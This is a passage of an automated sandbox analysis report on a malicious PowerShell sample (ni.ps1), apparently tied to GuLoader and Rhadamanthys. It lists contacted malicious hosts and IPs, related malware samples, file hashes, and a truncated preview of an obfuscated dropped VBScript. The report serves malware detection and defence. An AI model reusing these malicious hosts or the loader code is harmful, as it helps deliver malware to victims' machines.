                                                        https://www.erp-royal-crown.info/whpowershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: phishing
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        91.193.42.13
                                                        		www.pineappletech.aeBelgium
                                                        		48694ITFPLfalse
                                                        93.95.216.175
                                                        		fornid.comItaly
                                                        		52030SERVERPLAN-ASITtrue
                                                        148.251.114.233
                                                        		erp-royal-crown.infoGermany
                                                        		24940HETZNER-ASDEfalse
                                                        184.171.244.231
                                                        		almrwad.comUnited States
                                                        		33182DIMENOCUSfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1568993
                                                        Start date and time:2024-12-05 10:37:06 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 0s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:ni.ps1
                                                        Detection:MAL
                                                        Classification:mal100.expl.evad.winPS1@11/13@6/4
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 11
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .ps1

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target powershell.exe, PID 2956 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 4768 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 7164 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: ni.ps1

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        04:38:08API Interceptor2079460x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        91.193.42.13qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                          List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                            148.251.114.233PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                            • www.eslameldaramlly.site/30vc/
                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                            • www.eslameldaramlly.site/30vc/
                                                            PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.eslameldaramlly.site/fchs/
                                                            PO23100072.exeGet hashmaliciousFormBookBrowse
                                                            • www.eslameldaramlly.site/30vc/
                                                            PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                            • www.eslameldaramlly.site/30vc/
                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                            • www.eslameldaramlly.site/30vc/
                                                            184.171.244.231qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  www.pineappletech.aeqc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • 91.193.42.13
                                                                  List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • 91.193.42.13

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  DIMENOCUSfile.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, RHADAMANTHYS, Stealc, VidarBrowse
                                                                  • 67.23.237.28
                                                                  file.exeGet hashmaliciousAmadeyBrowse
                                                                  • 67.23.237.28
                                                                  mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 8.33.162.220
                                                                  Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousHTMLPhisherBrowse
                                                                  • 177.234.150.226
                                                                  3e5cb809-f546-fb3c-b0e3-5de228b453ab.emlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 177.234.150.226
                                                                  3e5cb809-f546-fb3c-b0e3-5de228b453ab.emlGet hashmaliciousHTMLPhisherBrowse
                                                                  • 177.234.150.226
                                                                  PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                  • 67.23.226.139
                                                                  Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 67.23.226.139
                                                                  Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  • 67.23.226.139
                                                                  hiss.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                  • 198.136.58.114
                                                                  ITFPLqc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • 91.193.42.13
                                                                  List of Required items and services.zipGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • 91.193.42.13
                                                                  KgQJ0dIs3A.exeGet hashmaliciousAmadey, zgRATBrowse
                                                                  • 91.193.43.180
                                                                  7GC8osUQMq.exeGet hashmaliciousAmadeyBrowse
                                                                  • 91.193.43.180
                                                                  Y3KkfxEZuo.exeGet hashmaliciouszgRATBrowse
                                                                  • 91.193.43.180
                                                                  wqb7dL448k.exeGet hashmaliciousAmadey, Xmrig, zgRATBrowse
                                                                  • 91.193.43.180
                                                                  Oupxwi.jsGet hashmaliciousQbotBrowse
                                                                  • 91.193.43.119
                                                                  Nyyne.jsGet hashmaliciousQbotBrowse
                                                                  • 91.193.43.119
                                                                  Nyyne.jsGet hashmaliciousUnknownBrowse
                                                                  • 91.193.43.119
                                                                  https://keyurahealthcare.com/va/?303761Get hashmaliciousUnknownBrowse
                                                                  • 91.193.43.119
                                                                  HETZNER-ASDEUPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                  • 88.99.61.52
                                                                  https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#CGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                  • 5.9.227.67
                                                                  Ttok18.exeGet hashmaliciousVidarBrowse
                                                                  • 159.69.102.165
                                                                  jtkhikadjthsad.exeGet hashmaliciousVidarBrowse
                                                                  • 159.69.102.165
                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                  • 159.69.102.165
                                                                  rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                  • 49.12.121.47
                                                                  o26qobnkQI.exeGet hashmaliciousVidarBrowse
                                                                  • 159.69.102.165
                                                                  https://ammyy.com/en/downloads.htmlGet hashmaliciousFlawedammyyBrowse
                                                                  • 136.243.18.118
                                                                  Advertising Agreement for Youtube Cooperation.scrGet hashmaliciousLummaC StealerBrowse
                                                                  • 148.251.0.164
                                                                  xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                  • 159.69.102.165
                                                                  SERVERPLAN-ASITuntrippingvT.ps1Get hashmaliciousUnknownBrowse
                                                                  • 46.254.34.201
                                                                  yT6gJFN0SR.lnkGet hashmaliciousUnknownBrowse
                                                                  • 46.254.34.201
                                                                  mX3IqRiuFo.lnkGet hashmaliciousUnknownBrowse
                                                                  • 46.254.34.201
                                                                  6K2g0GMmIE.lnkGet hashmaliciousUnknownBrowse
                                                                  • 46.254.34.201
                                                                  G9eWTvswoH.lnkGet hashmaliciousUnknownBrowse
                                                                  • 46.254.34.201
                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                  • 193.70.147.14
                                                                  Ordine Electricas BC Corp PO EDC0969388.batGet hashmaliciousGuLoaderBrowse
                                                                  • 185.81.4.143
                                                                  Play_VM-Now(Gdunphy)CQDM.htmGet hashmaliciousUnknownBrowse
                                                                  • 93.95.216.8
                                                                  Steel Dynamics.pdfGet hashmaliciousUnknownBrowse
                                                                  • 93.95.216.8
                                                                  citibank_0824_statement.lnkGet hashmaliciousUnknownBrowse
                                                                  • 46.254.34.201

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0eREQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  RFQ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  31#U544a.exeGet hashmaliciousCobaltStrikeBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  Patch.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  RuntimeBroker.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  Qsgtknmtt.exeGet hashmaliciousUnknownBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  Fzcaaz.exeGet hashmaliciousUnknownBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  Ekyrfzxogk.exeGet hashmaliciousUnknownBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231
                                                                  EHak.exeGet hashmaliciousUnknownBrowse
                                                                  • 91.193.42.13
                                                                  • 93.95.216.175
                                                                  • 148.251.114.233
                                                                  • 184.171.244.231

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\Public\eji.vbs

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with very long lines (332), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29620
                                                                  Entropy (8bit):5.166723827328713
                                                                  Encrypted:false
                                                                  SSDEEP:768:XYf48SKT1nPeL9GLfqAQnS710jlshl/cT7saN+:X04lKT1P0yfqAuRlsDQBN+
                                                                  MD5:23454878FB50859C4849AC2B6E256789
                                                                  SHA1:C737B3D0F1DCC9AD4A590BA9916B8F9DFA9F0168
                                                                  SHA-256:FF5B8F48D4F9C3FCED13466B68E9BD8722E2063A93BD781A5CCA3CD9C6864470
                                                                  SHA-512:3D318C9385C01286EAB9216A9AAFD7E3CB3D34C0E471E15F8904B7FA6CD9AA5C098FF9F6D29EA5362903CE3D217C0981BBB9120A34DC9DF7BACC391FF55311A6
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview:......Function Maculose242(Rektorat)......Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)....Maculose242 = ChrW(Rektorat)....Opskreknivsplid = Command ......End Function ....elektroingenirerne = LenB("Sardinieren") ..elektroingenirerne = elektroingenirerne xor clng(6932161) ...... ..Diareernes = 0.... ..Backspier70= array(65+5+0,69,77,59,72,73,62,59,66,66)......Kopvisdislocatedavic = Log(Len("Frihedsbevgelserne"))....Private Const Kbesum = 49485..Private Const Cornbird = 16348..Private Const Nyderes = "Pandaer verificative133 knopskydning,"..Private Const Terrorize = "Postansvarlige skjorternes"..Private Const Danseorkesteret = "Myndigstes150 exculpate trykkeriers puromucous"..Private Const Unignorant = &HF76C..Private Const Iodinophilous = -9045..Private Const Polyautography = 22989..Private Const Divisibly = -6735..Private Const Takeups = &H8FE6..Private Const Inductance = &H59DF..Private Const Thorax64 = -13300..Private Const Forkiness = &H96C8..Private Const Kondensatore

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):11608
                                                                  Entropy (8bit):4.890472898059848
                                                                  Encrypted:false
                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1940658735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:NlllulFyNXz:NllUI
                                                                  MD5:5F507BA3CB5E9028C7C7E403F7FC3AD0
                                                                  SHA1:C7488724C1EDA08F547EAD55E44FBF66CF6CC65E
                                                                  SHA-256:FB172939B33D5E25D69CBB9B572EC0C81B4ED99D21C5C4942C5223F6D5BD579E
                                                                  SHA-512:A83C115A11A41AD3312C0CE029FD00146D12C900AAE00DCD82972DF541412D6F8142AC87C1501FF57615F892B81603D654FF341FEFD02A30AA8A329984096C85
                                                                  Malicious:false
                                                                  Preview:@...e...................................z............@..........

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jidhmuh.tau.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiweuout.ek5.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1xz30ta.y1y.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsafox0q.ojz.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzqcsftt.mw4.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oawjkipw.pmd.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohy0lmqd.lnt.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrlxcjd2.qka.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3VLQIGDKRPTV1W4CWZOL.temp

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6222
                                                                  Entropy (8bit):3.70207152005108
                                                                  Encrypted:false
                                                                  SSDEEP:48:dCY5AGOCcbU2K+UDukvhkvklCywGn2k7GA/hlzFSogZolE7GA/hl+FSogZoh1:dLNOChoXkvhkvCCte7r/hmHX7r/hRH6
                                                                  MD5:3344C92923F5DE385F509748757E10F2
                                                                  SHA1:EADC78E12D199921036B474B87251519079F0629
                                                                  SHA-256:6830352E6428D9BE1C6EED36800D95DD0817342D8293CE83906F9D521E4660CB
                                                                  SHA-512:B9815968EB4E6D69376A4BB8CAF6F4544B26AF2B4F9F7F0C8C8CE2CDB07B604BE93C5843C7AE062F6709FC32E5922EA72FA0CD4D3EB8A947CFB7F07091272214
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...d.......l.b.F..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....1+.^.F.....c.F......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......DWSl.Y.L....C..................... ...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.L....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl.Y.L....E.......................+.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.L....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.L....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.L....q...........

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6222
                                                                  Entropy (8bit):3.70207152005108
                                                                  Encrypted:false
                                                                  SSDEEP:48:dCY5AGOCcbU2K+UDukvhkvklCywGn2k7GA/hlzFSogZolE7GA/hl+FSogZoh1:dLNOChoXkvhkvCCte7r/hmHX7r/hRH6
                                                                  MD5:3344C92923F5DE385F509748757E10F2
                                                                  SHA1:EADC78E12D199921036B474B87251519079F0629
                                                                  SHA-256:6830352E6428D9BE1C6EED36800D95DD0817342D8293CE83906F9D521E4660CB
                                                                  SHA-512:B9815968EB4E6D69376A4BB8CAF6F4544B26AF2B4F9F7F0C8C8CE2CDB07B604BE93C5843C7AE062F6709FC32E5922EA72FA0CD4D3EB8A947CFB7F07091272214
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...d.......l.b.F..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....1+.^.F.....c.F......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y.L....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......DWSl.Y.L....C..................... ...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y.L....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW#r..Windows.@......DWSl.Y.L....E.......................+.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y.L....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y.L....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.Y.L....q...........

                                                                  Static File Info

                                                                  General

                                                                  File type:ASCII text, with very long lines (825), with no line terminators
                                                                  Entropy (8bit):5.387046106067881
                                                                  TrID:
                                                                    File name:ni.ps1
                                                                    File size:825 bytes
